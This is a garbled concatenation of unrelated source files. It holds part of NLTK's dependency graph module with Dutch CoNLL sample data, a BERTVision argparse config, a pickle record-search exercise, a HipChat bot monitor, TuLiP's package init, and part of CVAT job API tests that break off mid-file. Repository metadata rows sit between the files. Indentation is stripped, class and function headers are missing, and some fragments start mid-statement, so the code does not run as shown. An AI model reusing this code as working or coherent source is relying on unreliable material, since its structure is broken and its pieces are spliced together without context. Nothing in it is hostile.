4 gewoon gewoon Adj Adj adv|stell|onverv 10 mod _ _
5 met met Prep Prep voor 10 mod _ _
6 haar haar Pron Pron bez|3|ev|neut|attr 7 det _ _
7 vriendinnen vriendin N N soort|mv|neut 5 obj1 _ _
8 rond rond Adv Adv deelv 10 svp _ _
9 kunnen kan V V hulp|inf 3 vc _ _
10 slenteren slenter V V intrans|inf 9 vc _ _
11 in in Prep Prep voor 10 mod _ _
12 de de Art Art bep|zijdofmv|neut 13 det _ _
13 buurt buurt N N soort|ev|neut 11 obj1 _ _
14 van van Prep Prep voor 13 mod _ _
15 Trafalgar_Square Trafalgar_Square MWU N_N eigen|ev|neut_eigen|ev|neut 14 obj1 _ _
16 . . Punc Punc punt 15 punct _ _
"""
if __name__ == "__main__":
demo()
| 39.555128 | 118 | 0.454769 |
from collections import defaultdict
from itertools import chain
from pprint import pformat
import subprocess
import warnings
from nltk.tree import Tree
for tree_str in infile.read().split("\n\n")
]
def left_children(self, node_index):
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c < index)
def right_children(self, node_index):
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c > index)
def add_node(self, node):
if not self.contains_address(node["address"]):
self.nodes[node["address"]].update(node)
def _parse(
self,
input_,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
def extract_3_cells(cells, index):
word, tag, head = cells
return index, word, word, tag, tag, "", head, ""
def extract_4_cells(cells, index):
word, tag, head, rel = cells
return index, word, word, tag, tag, "", head, rel
def extract_7_cells(cells, index):
line_index, word, lemma, tag, _, head, rel = cells
try:
index = int(line_index)
except ValueError:
pass
return index, word, lemma, tag, tag, "", head, rel
def extract_10_cells(cells, index):
line_index, word, lemma, ctag, tag, feats, head, rel, _, _ = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, ctag, tag, feats, head, rel
extractors = {
3: extract_3_cells,
4: extract_4_cells,
7: extract_7_cells,
10: extract_10_cells,
}
if isinstance(input_, str):
input_ = (line for line in input_.split("\n"))
lines = (l.rstrip() for l in input_)
lines = (l for l in lines if l)
cell_number = None
for index, line in enumerate(lines, start=1):
cells = line.split(cell_separator)
if cell_number is None:
cell_number = len(cells)
else:
assert cell_number == len(cells)
if cell_extractor is None:
try:
cell_extractor = extractors[cell_number]
except KeyError as e:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(cell_number)
) from e
try:
index, word, lemma, ctag, tag, feats, head, rel = cell_extractor(
cells, index
)
except (TypeError, ValueError):
word, lemma, ctag, tag, feats, head, rel = cell_extractor(cells)
if head == "_":
continue
head = int(head)
if zero_based:
head += 1
self.nodes[index].update(
{
"address": index,
"word": word,
"lemma": lemma,
"ctag": ctag,
"tag": tag,
"feats": feats,
"head": head,
"rel": rel,
}
)
# Make sure that the fake root node has labeled dependencies.
if (cell_number == 3) and (head == 0):
rel = top_relation_label
self.nodes[head]["deps"][rel].append(index)
if self.nodes[0]["deps"][top_relation_label]:
root_address = self.nodes[0]["deps"][top_relation_label][0]
self.root = self.nodes[root_address]
self.top_relation_label = top_relation_label
else:
warnings.warn(
"The graph doesn't contain a node " "that depends on the root element."
)
def _word(self, node, filter=True):
w = node["word"]
if filter:
if w != ",":
return w
return w
def _tree(self, i):
node = self.get_by_address(i)
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
if deps:
return Tree(word, [self._tree(dep) for dep in deps])
else:
return word
def tree(self):
node = self.root
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
return Tree(word, [self._tree(dep) for dep in deps])
def triples(self, node=None):
if not node:
node = self.root
head = (node["word"], node["ctag"])
for i in sorted(chain.from_iterable(node["deps"].values())):
dep = self.get_by_address(i)
yield (head, dep["rel"], (dep["word"], dep["ctag"]))
for triple in self.triples(node=dep):
yield triple
def _hd(self, i):
try:
return self.nodes[i]["head"]
except IndexError:
return None
def _rel(self, i):
try:
return self.nodes[i]["rel"]
except IndexError:
return None
def contains_cycle(self):
distances = {}
for node in self.nodes.values():
for dep in node["deps"]:
key = tuple([node["address"], dep])
distances[key] = 1
for _ in self.nodes:
new_entries = {}
for pair1 in distances:
for pair2 in distances:
if pair1[1] == pair2[0]:
key = tuple([pair1[0], pair2[1]])
new_entries[key] = distances[pair1] + distances[pair2]
for pair in new_entries:
distances[pair] = new_entries[pair]
if pair[0] == pair[1]:
path = self.get_cycle_path(self.get_by_address(pair[0]), pair[0])
return path
return False # return []?
def get_cycle_path(self, curr_node, goal_node_index):
for dep in curr_node["deps"]:
if dep == goal_node_index:
return [curr_node["address"]]
for dep in curr_node["deps"]:
path = self.get_cycle_path(self.get_by_address(dep), goal_node_index)
if len(path) > 0:
path.insert(0, curr_node["address"])
return path
return []
def to_conll(self, style):
if style == 3:
template = "{word}\t{tag}\t{head}\n"
elif style == 4:
template = "{word}\t{tag}\t{head}\t{rel}\n"
elif style == 10:
template = (
"{i}\t{word}\t{lemma}\t{ctag}\t{tag}\t{feats}\t{head}\t{rel}\t_\t_\n"
)
else:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(style)
)
return "".join(
template.format(i=i, **node)
for i, node in sorted(self.nodes.items())
if node["tag"] != "TOP"
)
def nx_graph(self):
import networkx
nx_nodelist = list(range(1, len(self.nodes)))
nx_edgelist = [
(n, self._hd(n), self._rel(n)) for n in nx_nodelist if self._hd(n)
]
self.nx_labels = {}
for n in nx_nodelist:
self.nx_labels[n] = self.nodes[n]["word"]
g = networkx.MultiDiGraph()
g.add_nodes_from(nx_nodelist)
g.add_edges_from(nx_edgelist)
return g
class DependencyGraphError(Exception):
def demo():
malt_demo()
conll_demo()
conll_file_demo()
cycle_finding_demo()
def malt_demo(nx=False):
dg = DependencyGraph(
"""Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
)
tree = dg.tree()
tree.pprint()
if nx:
# currently doesn't work
import networkx
from matplotlib import pylab
g = dg.nx_graph()
g.info()
pos = networkx.spring_layout(g, dim=1)
networkx.draw_networkx_nodes(g, pos, node_size=50)
networkx.draw_networkx_labels(g, pos, dg.nx_labels)
pylab.xticks([])
pylab.yticks([])
pylab.savefig("tree.png")
pylab.show()
def conll_demo():
dg = DependencyGraph(conll_data1)
tree = dg.tree()
tree.pprint()
print(dg)
print(dg.to_conll(4))
def conll_file_demo():
print("Mass conll_read demo...")
graphs = [DependencyGraph(entry) for entry in conll_data2.split("\n\n") if entry]
for graph in graphs:
tree = graph.tree()
print("\n")
tree.pprint()
def cycle_finding_demo():
dg = DependencyGraph(treebank_data)
print(dg.contains_cycle())
cyclic_dg = DependencyGraph()
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "TOP", "address": 0})
cyclic_dg.add_node({"word": None, "deps": [2], "rel": "NTOP", "address": 1})
cyclic_dg.add_node({"word": None, "deps": [4], "rel": "NTOP", "address": 2})
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "NTOP", "address": 3})
cyclic_dg.add_node({"word": None, "deps": [3], "rel": "NTOP", "address": 4})
print(cyclic_dg.contains_cycle())
treebank_data = """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
conll_data1 = """
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
"""
conll_data2 = """1 Cathy Cathy N N eigen|ev|neut 2 su _ _
2 zag zie V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 hen hen Pron Pron per|3|mv|datofacc 2 obj1 _ _
4 wild wild Adj Adj attr|stell|onverv 5 mod _ _
5 zwaaien zwaai N N soort|mv|neut 2 vc _ _
6 . . Punc Punc punt 5 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
1 Dat dat Pron Pron aanw|neut|attr 2 det _ _
2 werkwoord werkwoord N N soort|ev|neut 6 obj1 _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 ze ze Pron Pron per|3|evofmv|nom 6 su _ _
5 zelf zelf Pron Pron aanw|neut|attr|wzelf 3 predm _ _
6 uitgevonden vind V V trans|verldw|onverv 3 vc _ _
7 . . Punc Punc punt 6 punct _ _
1 Het het Pron Pron onbep|neut|zelfst 2 su _ _
2 hoorde hoor V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 bij bij Prep Prep voor 2 ld _ _
4 de de Art Art bep|zijdofmv|neut 6 det _ _
5 warme warm Adj Adj attr|stell|vervneut 6 mod _ _
6 zomerdag zomerdag N N soort|ev|neut 3 obj1 _ _
7 die die Pron Pron betr|neut|zelfst 6 mod _ _
8 ze ze Pron Pron per|3|evofmv|nom 12 su _ _
9 ginds ginds Adv Adv gew|aanw 12 mod _ _
10 achter achter Adv Adv gew|geenfunc|stell|onverv 12 svp _ _
11 had heb V V hulp|ovt|1of2of3|ev 7 body _ _
12 gelaten laat V V trans|verldw|onverv 11 vc _ _
13 . . Punc Punc punt 12 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 hadden heb V V trans|ovt|1of2of3|mv 0 ROOT _ _
3 languit languit Adv Adv gew|geenfunc|stell|onverv 11 mod _ _
4 naast naast Prep Prep voor 11 mod _ _
5 elkaar elkaar Pron Pron rec|neut 4 obj1 _ _
6 op op Prep Prep voor 11 ld _ _
7 de de Art Art bep|zijdofmv|neut 8 det _ _
8 strandstoelen strandstoel N N soort|mv|neut 6 obj1 _ _
9 kunnen kan V V hulp|inf 2 vc _ _
10 gaan ga V V hulp|inf 9 vc _ _
11 liggen lig V V intrans|inf 10 vc _ _
12 . . Punc Punc punt 11 punct _ _
1 Zij zij Pron Pron per|3|evofmv|nom 2 su _ _
2 zou zal V V hulp|ovt|1of2of3|ev 7 cnj _ _
3 mams mams N N soort|ev|neut 4 det _ _
4 rug rug N N soort|ev|neut 5 obj1 _ _
5 ingewreven wrijf V V trans|verldw|onverv 6 vc _ _
6 hebben heb V V hulp|inf 2 vc _ _
7 en en Conj Conj neven 0 ROOT _ _
8 mam mam V V trans|ovt|1of2of3|ev 7 cnj _ _
9 de de Art Art bep|zijdofmv|neut 10 det _ _
10 hare hare Pron Pron bez|3|ev|neut|attr 8 obj1 _ _
11 . . Punc Punc punt 10 punct _ _
1 Of of Conj Conj onder|metfin 0 ROOT _ _
2 ze ze Pron Pron per|3|evofmv|nom 3 su _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 gewoon gewoon Adj Adj adv|stell|onverv 10 mod _ _
5 met met Prep Prep voor 10 mod _ _
6 haar haar Pron Pron bez|3|ev|neut|attr 7 det _ _
7 vriendinnen vriendin N N soort|mv|neut 5 obj1 _ _
8 rond rond Adv Adv deelv 10 svp _ _
9 kunnen kan V V hulp|inf 3 vc _ _
10 slenteren slenter V V intrans|inf 9 vc _ _
11 in in Prep Prep voor 10 mod _ _
12 de de Art Art bep|zijdofmv|neut 13 det _ _
13 buurt buurt N N soort|ev|neut 11 obj1 _ _
14 van van Prep Prep voor 13 mod _ _
15 Trafalgar_Square Trafalgar_Square MWU N_N eigen|ev|neut_eigen|ev|neut 14 obj1 _ _
16 . . Punc Punc punt 15 punct _ _
"""
if __name__ == "__main__":
demo()
| true | true |
f7100dfc5d3a59776b012e0dd0e3c6e254fd289d | 2,169 | py | Python | code/torch/models/hypersearch/args.py | siduojiang/BERTVision | 9d0d4856300973488ead67e2d06e243bf07447ad | [
"MIT"
] | 5 | 2020-08-06T10:12:08.000Z | 2022-03-17T10:38:40.000Z | code/torch/models/hypersearch/args.py | siduojiang/BERTVision | 9d0d4856300973488ead67e2d06e243bf07447ad | [
"MIT"
] | 9 | 2020-06-23T16:57:52.000Z | 2021-01-17T01:52:45.000Z | code/torch/models/hypersearch/args.py | cbenge509/BERTVision | 01519bea0882fa72e86a1b62f2d0d52d22c26dfc | [
"MIT"
] | null | null | null | import os, sys
sys.path.append("C:\\BERTVision\\code\\torch")
import torch
import models.args
def get_args():
# retreive the general models.args and attach them here
parser = models.args.get_args()
# set search specific args
parser.add_argument('--model',
type=str,
default='MSR',
required=True)
parser.add_argument('--checkpoint',
type=str,
default='bert-base-uncased',
required=True,
help='A HuggingFace checkpoint e.g., bert-base-uncased')
parser.add_argument('--num-labels',
default=2,
type=int)
parser.add_argument('--max-seq-length',
default=86,
type=int,
help='Tokenization max length')
parser.add_argument('--save-path',
type=str,
default=os.path.join('model_checkpoints'))
parser.add_argument('--log-path',
type=str,
default=os.path.join('model_logs'))
parser.add_argument('--warmup-proportion',
default=0.1,
type=float,
help='Proportion of training to perform linear learning rate warmup for')
parser.add_argument('--batch-size',
type=int,
default=16,
help='input batch size for training (default: 16)')
parser.add_argument('--lr',
type=float,
default=1e-5,
help='learning rate (default: 1e-5)')
parser.add_argument('--num-workers',
type=int,
default=0,
help='Number of CPU cores (default: 0)')
parser.add_argument('--shard',
type=float,
default=0.10,
help='Percentage of training set to sample from')
args = parser.parse_args()
return args
#
| 37.396552 | 97 | 0.467958 | import os, sys
sys.path.append("C:\\BERTVision\\code\\torch")
import torch
import models.args
def get_args():
parser = models.args.get_args()
parser.add_argument('--model',
type=str,
default='MSR',
required=True)
parser.add_argument('--checkpoint',
type=str,
default='bert-base-uncased',
required=True,
help='A HuggingFace checkpoint e.g., bert-base-uncased')
parser.add_argument('--num-labels',
default=2,
type=int)
parser.add_argument('--max-seq-length',
default=86,
type=int,
help='Tokenization max length')
parser.add_argument('--save-path',
type=str,
default=os.path.join('model_checkpoints'))
parser.add_argument('--log-path',
type=str,
default=os.path.join('model_logs'))
parser.add_argument('--warmup-proportion',
default=0.1,
type=float,
help='Proportion of training to perform linear learning rate warmup for')
parser.add_argument('--batch-size',
type=int,
default=16,
help='input batch size for training (default: 16)')
parser.add_argument('--lr',
type=float,
default=1e-5,
help='learning rate (default: 1e-5)')
parser.add_argument('--num-workers',
type=int,
default=0,
help='Number of CPU cores (default: 0)')
parser.add_argument('--shard',
type=float,
default=0.10,
help='Percentage of training set to sample from')
args = parser.parse_args()
return args
| true | true |
f7100f39a080309ca2cb603931b8da369057f812 | 717 | py | Python | BOOK/MAIN/05-file-handling/chapter-5-examples/15-display-records.py | kabirsrivastava3/python-practice | f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5 | [
"MIT"
] | null | null | null | BOOK/MAIN/05-file-handling/chapter-5-examples/15-display-records.py | kabirsrivastava3/python-practice | f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5 | [
"MIT"
] | null | null | null | BOOK/MAIN/05-file-handling/chapter-5-examples/15-display-records.py | kabirsrivastava3/python-practice | f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5 | [
"MIT"
] | null | null | null | #display records of students of roll no. 22 and 23.
import pickle
stu = {} #declare empty dictionary object; it will hold record
found = False
finObj = open('Stu.dat',"rb") #open binary file in read mode
searchKeys = [22,23]
#read from the file
try:
print("File Stu.dat store these records")
while True: #it will become False upon EOF Exception.
stu = pickle.load(finObj) #read record in stu dictionary fron finObj file handle
if stu['Rollno'] in searchKeys:
print(stu) #print the record
found = True
except EOFError:
if found == False:
print("No such records found in the file")
else:
print("Search successful.")
finObj.close() #close file
| 29.875 | 88 | 0.665272 |
import pickle
stu = {}
found = False
finObj = open('Stu.dat',"rb")
searchKeys = [22,23]
try:
print("File Stu.dat store these records")
while True:
stu = pickle.load(finObj)
if stu['Rollno'] in searchKeys:
print(stu)
found = True
except EOFError:
if found == False:
print("No such records found in the file")
else:
print("Search successful.")
finObj.close()
| true | true |
f7100ff56bd69c1d3a211ca0a9af3fcd0dae54de | 1,835 | py | Python | client/hipchat/HipChatMonitor.py | xEoDx/eodbot | 933d9c1c9c836a5a6091a26bfd4d7eb98f932595 | [
"Apache-2.0"
] | null | null | null | client/hipchat/HipChatMonitor.py | xEoDx/eodbot | 933d9c1c9c836a5a6091a26bfd4d7eb98f932595 | [
"Apache-2.0"
] | 5 | 2020-03-04T21:39:32.000Z | 2021-12-09T19:43:28.000Z | client/hipchat/HipChatMonitor.py | xEoDx/eodbot | 933d9c1c9c836a5a6091a26bfd4d7eb98f932595 | [
"Apache-2.0"
] | null | null | null | from hipchat import HipChatManager
import time
import configparser
_MAX_SLEEP_TIME = 5
_MIN_SLEEP_TIME = 2
_SPAM_EODBOT_URL = 3500
class HipChatMonitor:
def __init__(self, eodBotParser):
print("Initializing HipChatMonitor with eodBotParser: ",eodBotParser)
self.sleepTime = _MIN_SLEEP_TIME
self.lastIdChecked = ""
self.eodBotParser = eodBotParser
config = configparser.ConfigParser()
config.read('config.ini')
self.bot_id=config['HIPCHAT']['hipchat.bot_id']
self.hipChatManager = HipChatManager.HipChatManager();
self.spamLastEodBotUrlTime = 0
self.hipChatManager.send("[EodBot] I've been initialised! Troll time just started :)")
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
def __adjustInterval(self, failed):
if(failed == "true"):
if(self.sleepTime < _MAX_SLEEP_TIME):
self.sleepTime += 1
else:
self.sleepTime = _MIN_SLEEP_TIME
def start(self):
while 1==1:
newestMessage = self.hipChatManager.fetch()
if((str(newestMessage["from"]) != "Sassy") and (str(newestMessage["from"]["id"]) != self.bot_id) and (newestMessage["id"] != self.lastIdChecked)):
self.lastIdChecked = newestMessage["id"]
print("Parsing message: ",newestMessage['message'])
messageToSend = self.eodBotParser.parse(newestMessage['message'])
if(messageToSend != None):
self.hipChatManager.send(messageToSend)
self.__adjustInterval("false")
else:
self.__adjustInterval("true")
print("Sleeping for ",self.sleepTime," seconds")
time.sleep(self.sleepTime)
self.spamLastEodBotUrlTime += 1
if(self.spamLastEodBotUrlTime >= _SPAM_EODBOT_URL):
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
self.spamLastEodBotUrlTime = 0
| 35.288462 | 149 | 0.725886 | from hipchat import HipChatManager
import time
import configparser
_MAX_SLEEP_TIME = 5
_MIN_SLEEP_TIME = 2
_SPAM_EODBOT_URL = 3500
class HipChatMonitor:
def __init__(self, eodBotParser):
print("Initializing HipChatMonitor with eodBotParser: ",eodBotParser)
self.sleepTime = _MIN_SLEEP_TIME
self.lastIdChecked = ""
self.eodBotParser = eodBotParser
config = configparser.ConfigParser()
config.read('config.ini')
self.bot_id=config['HIPCHAT']['hipchat.bot_id']
self.hipChatManager = HipChatManager.HipChatManager();
self.spamLastEodBotUrlTime = 0
self.hipChatManager.send("[EodBot] I've been initialised! Troll time just started :)")
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
def __adjustInterval(self, failed):
if(failed == "true"):
if(self.sleepTime < _MAX_SLEEP_TIME):
self.sleepTime += 1
else:
self.sleepTime = _MIN_SLEEP_TIME
def start(self):
while 1==1:
newestMessage = self.hipChatManager.fetch()
if((str(newestMessage["from"]) != "Sassy") and (str(newestMessage["from"]["id"]) != self.bot_id) and (newestMessage["id"] != self.lastIdChecked)):
self.lastIdChecked = newestMessage["id"]
print("Parsing message: ",newestMessage['message'])
messageToSend = self.eodBotParser.parse(newestMessage['message'])
if(messageToSend != None):
self.hipChatManager.send(messageToSend)
self.__adjustInterval("false")
else:
self.__adjustInterval("true")
print("Sleeping for ",self.sleepTime," seconds")
time.sleep(self.sleepTime)
self.spamLastEodBotUrlTime += 1
if(self.spamLastEodBotUrlTime >= _SPAM_EODBOT_URL):
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
self.spamLastEodBotUrlTime = 0
| true | true |
f71010536d580e3dc257b139c71119eec3b95907 | 2,202 | py | Python | tulip/transys/__init__.py | miquelramirez/tulip-control | ce54897c242689f45ad33650f157bf1805b35ed6 | [
"BSD-3-Clause"
] | 1 | 2020-02-13T14:13:50.000Z | 2020-02-13T14:13:50.000Z | tulip/transys/__init__.py | miquelramirez/tulip-control | ce54897c242689f45ad33650f157bf1805b35ed6 | [
"BSD-3-Clause"
] | null | null | null | tulip/transys/__init__.py | miquelramirez/tulip-control | ce54897c242689f45ad33650f157bf1805b35ed6 | [
"BSD-3-Clause"
] | 1 | 2019-07-09T16:32:39.000Z | 2019-07-09T16:32:39.000Z | # Copyright (c) 2013-2014 by California Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
# OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
"""TuLiP Toolbox Transition System subpackage
Suggested abbreviation:
>>> from tulip import transys as trs
"""
from __future__ import absolute_import
from .mathset import MathSet, SubSet, PowerSet, TypedDict
from .labeled_graphs import prepend_with
from .transys import (
KripkeStructure, FiniteTransitionSystem, FTS,
LabeledGameGraph,
tuple2fts, line_labeled_with, cycle_labeled_with
)
from .automata import (
BuchiAutomaton, BA, tuple2ba,
RabinAutomaton, DRA,
ParityGame
)
from .machines import MooreMachine, MealyMachine
from .products import OnTheFlyProductAutomaton
| 38.631579 | 73 | 0.781108 |
from __future__ import absolute_import
from .mathset import MathSet, SubSet, PowerSet, TypedDict
from .labeled_graphs import prepend_with
from .transys import (
KripkeStructure, FiniteTransitionSystem, FTS,
LabeledGameGraph,
tuple2fts, line_labeled_with, cycle_labeled_with
)
from .automata import (
BuchiAutomaton, BA, tuple2ba,
RabinAutomaton, DRA,
ParityGame
)
from .machines import MooreMachine, MealyMachine
from .products import OnTheFlyProductAutomaton
| true | true |
f71011ebc8324e6ec4b4d16a31c684a403ca6635 | 325 | py | Python | FindNumberswithEvenNumberofDigits.py | eagletusk/pythonPractice | 4ac8d8c2f45072407b8f25514a3e54bddcd38a33 | [
"MIT"
] | null | null | null | FindNumberswithEvenNumberofDigits.py | eagletusk/pythonPractice | 4ac8d8c2f45072407b8f25514a3e54bddcd38a33 | [
"MIT"
] | null | null | null | FindNumberswithEvenNumberofDigits.py | eagletusk/pythonPractice | 4ac8d8c2f45072407b8f25514a3e54bddcd38a33 | [
"MIT"
] | null | null | null | class Solution:
def findNumbers(self, nums: List[int]) -> int:
bkt =[]
for n in nums:
count = str(n).count('')-1
print (str(n), count)
if count%2 == 0 :
bkt.append(count)
count =0
count =0
return len(bkt)
| 27.083333 | 50 | 0.412308 | class Solution:
def findNumbers(self, nums: List[int]) -> int:
bkt =[]
for n in nums:
count = str(n).count('')-1
print (str(n), count)
if count%2 == 0 :
bkt.append(count)
count =0
count =0
return len(bkt)
| true | true |
f710122a35afda1f83e03c6f8b0342dcee505738 | 12,984 | py | Python | tests/rest_api/test_jobs.py | campin11/cvat | 085ccce1cfb018d4eea2309d3086f4c8909c2cd3 | [
"Intel",
"MIT"
] | null | null | null | tests/rest_api/test_jobs.py | campin11/cvat | 085ccce1cfb018d4eea2309d3086f4c8909c2cd3 | [
"Intel",
"MIT"
] | null | null | null | tests/rest_api/test_jobs.py | campin11/cvat | 085ccce1cfb018d4eea2309d3086f4c8909c2cd3 | [
"Intel",
"MIT"
] | null | null | null | # Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
from http import HTTPStatus
from deepdiff import DeepDiff
import pytest
from .utils.config import get_method, patch_method
def get_job_staff(job, tasks, projects):
job_staff = []
job_staff.append(job['assignee'])
tid = job['task_id']
job_staff.append(tasks[tid]['owner'])
job_staff.append(tasks[tid]['assignee'])
pid = job['project_id']
if pid:
job_staff.append(projects[pid]['owner'])
job_staff.append(projects[pid]['assignee'])
job_staff = set(u['id'] for u in job_staff if u is not None)
return job_staff
def filter_jobs(jobs, tasks, org):
if org is None:
kwargs = {}
jobs = jobs.raw
elif org == '':
kwargs = {'org': ''}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] is None]
else:
kwargs = {'org_id': org}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] == org]
return jobs, kwargs
class TestGetJobs:
def _test_get_job_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()) == {}
def _test_get_job_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_get_job(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
# keep only the reasonable amount of jobs
for job in jobs[:8]:
self._test_get_job_200('admin2', job['id'], job, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_get_job(self, org_id, groups, users, jobs, tasks, projects,
org_staff):
# keep the reasonable amount of users and jobs
users = [u for u in users if u['groups'] == groups][:4]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for job in jobs[:8]:
job_staff = get_job_staff(job, tasks, projects)
# check if the specific user in job_staff to see the job
for user in users:
if user['id'] in job_staff | org_staff:
self._test_get_job_200(user['username'], job['id'], job, **kwargs)
else:
self._test_get_job_403(user['username'], job['id'], **kwargs)
class TestListJobs:
def _test_list_jobs_200(self, user, data, **kwargs):
response = get_method(user, 'jobs', **kwargs, page_size=all)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()['results']) == {}
def _test_list_jobs_403(self, user, **kwargs):
response = get_method(user, 'jobs', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_list_jobs(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
self._test_list_jobs_200('admin1', jobs, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_list_jobs(self, org_id, groups, users, jobs, tasks,
projects, org_staff, is_org_member):
users = [u for u in users if u['groups'] == groups][:2]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for user in users:
user_jobs = []
for job in jobs:
job_staff = get_job_staff(job, tasks, projects)
if user['id'] in job_staff | org_staff:
user_jobs.append(job)
if is_org_member(user['id'], org_id):
self._test_list_jobs_200(user['username'], user_jobs, **kwargs)
else:
self._test_list_jobs_403(user['username'], **kwargs)
class TestGetAnnotations:
